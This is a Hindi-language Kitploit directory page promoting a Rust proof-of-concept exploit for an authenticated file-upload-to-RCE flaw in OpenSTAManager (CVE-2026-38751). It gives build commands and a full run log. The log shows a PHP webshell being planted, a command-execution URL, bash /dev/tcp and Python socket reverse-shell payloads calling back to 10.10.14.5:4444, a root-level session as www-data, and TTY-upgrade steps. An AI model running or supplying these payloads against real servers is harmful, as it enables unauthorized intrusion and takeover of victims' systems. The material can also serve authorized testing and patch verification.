Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
OpenSTAManager-RCE-Exploit-CVE-2026-38751 — OpenSTAManager-RCE-Exploit-CVE-2026-38751 | Kitploit
उपकरण/GitHubGitHub/b0ysie7e/openstamanager-rce-exploit-cve-2026-38751
भेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
b0ysie7e/openstamanager-rce-exploit-cve-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

रिपॉजिटरी देखें
81 महीना पहलेअभी तक समीक्षित नहीं

OpenSTAManager RCE एक्सप्लॉइट (CVE-2026-38751)

दूरस्थ कोड निष्पादन की ओर ले जाने वाला मनमाना फ़ाइल अपलोड
CVE-2026-38751 के लिए पूर्ण-विशेषताओं वाला प्रूफ-ऑफ-कॉन्सेप्ट, जो Rust में लिखा गया है।

चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।


विवरण

OpenSTAManager ≤ 2.10, प्रमाणित मनमाना फ़ाइल अपलोड भेद्यता से ग्रस्त है, जो हमलावर को PHP वेबशेल युक्त एक दुर्भावनापूर्ण ZIP संग्रह अपलोड करने की अनुमति देता है। यह PoC इस प्रक्रिया को स्वचालित करता है:

  • वैध क्रेडेंशियल्स के साथ लॉगिन करें
  • वेबशेल के साथ एक दुर्भावनापूर्ण मॉड्यूल अपलोड करें
  • भेद्यता की पुष्टि करें
  • इंटरैक्टिव वेब शेल (कमांड निष्पादन)
  • TTY हैंडलिंग के साथ रिवर्स शेल (कई पेलोड)
  • अपलोड किए गए बैकडोर की सफाई

विशेषताएँ

विशेषताविवरण
लॉगिनप्रदान किए गए क्रेडेंशियल्स का उपयोग करके प्रमाणित करता है।
ZIP निर्माणएक मान्य MODULE डिस्क्रिप्टर और PHP शेल के साथ ZIP फ़ाइल बनाता है।
फ़ाइल अपलोडअपडेट तंत्र के माध्यम से दुर्भावनापूर्ण ZIP भेजता है।
सत्यापनजाँच करता है कि शेल सुलभ है या नहीं और एक परीक्षण कमांड (id) निष्पादित करता है।
इंटरैक्टिव वेब‑शेलआपको वेबशेल के माध्यम से इंटरैक्टिव रूप से कमांड चलाने देता है (-i).
रिवर्स शेलशेल प्राप्त करने के लिए कई पेलोड (bash, python, base64, nc, mkfifo) भेजता है।
TTY अपग्रेड निर्देशपूर्ण रूप से इंटरैक्टिव TTY प्राप्त करने के लिए चरण‑दर‑चरण मार्गदर्शिका दिखाता है।
सफाईअपलोड किए गए shell.php को स्वचालित रूप से हटा देता है (जब तक --no-cleanup न दिया गया हो)।

🛠️ आवश्यकताएँ

  • Rust (1.70+)
  • OpenSTAManager ≤ 2.10 चलाने वाला एक लक्ष्य।
  • लॉगिन करने के लिए एक मान्य उपयोगकर्ता खाता (पासवर्ड के साथ)।

स्थापना

रिपॉजिटरी क्लोन करें और बाइनरी बनाएँ:

root@kitploit:~
git clone https://github.com/yourusername/OpenSTAManager-RCE-Exploit-CVE-2026-38751
cd OpenSTAManager-RCE-Exploit-CVE-2026-38751
cargo build --release
./target/release/openstamanager-rce-exploit --help

उदाहरण:

root@kitploit:~
$ ./openstamanager-rce-exploit --url http://target.com/ -U <user> -P <password> --lhost 10.10.14.5 --lport 4444

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com/
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 500 Internal Server Error
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Listening on 10.10.14.5:4444...
[*] Trying payload: bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
[-] Payload failed: operation timed out
[*] Trying payload: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[-] Payload failed: operation timed out
[*] Trying payload: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[+] Payload sent successfully. Waiting for connection...
[+] Connection received from 10.129.19.238:55758
[*] Sent 'script /dev/null -c bash'

[*]
[*] Reverse shell established.
[*] To get a fully interactive TTY:
[*] 1. Press Ctrl+Z to suspend the shell.
[*] 2. Run: stty raw -echo; fg
[*] 3. When prompted for terminal type, type: xterm
[*] 4. Export: export TERM=xterm SHELL=bash
[*] 5. Adjust rows/columns with: stty rows <rows> columns <cols>
[*]    (Get the size with: stty size)
[*]
[*] Press Ctrl+C to exit and cleanup the webshell.

bash: cannot set terminal process group (1481): Inappropriate ioctl for device
bash: no job control in this shell
www-data@target:~/html/openstamanager/modules/shell$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@target:~/html/openstamanager/modules/shell$ whoami
whoami
www-data
www-data@target:~/html/openstamanager/modules/shell$
टूल डाउनलोड करें